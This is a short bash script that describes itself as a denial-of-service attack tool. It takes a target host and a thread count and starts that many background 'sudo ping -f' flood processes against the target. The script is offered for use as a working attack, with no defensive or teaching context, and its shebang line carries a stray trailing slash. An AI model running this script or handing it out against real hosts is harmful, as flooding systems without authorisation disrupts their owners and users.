#! /bin/bash/
# Attempts to do a denial of service attack by backgrounding a specified number of ping floods

echo "Flooding..."

thread=1
while [ $thread -le $2 ]; do
    sudo ping -f $1 > /dev/null &
    let "thread++"
done
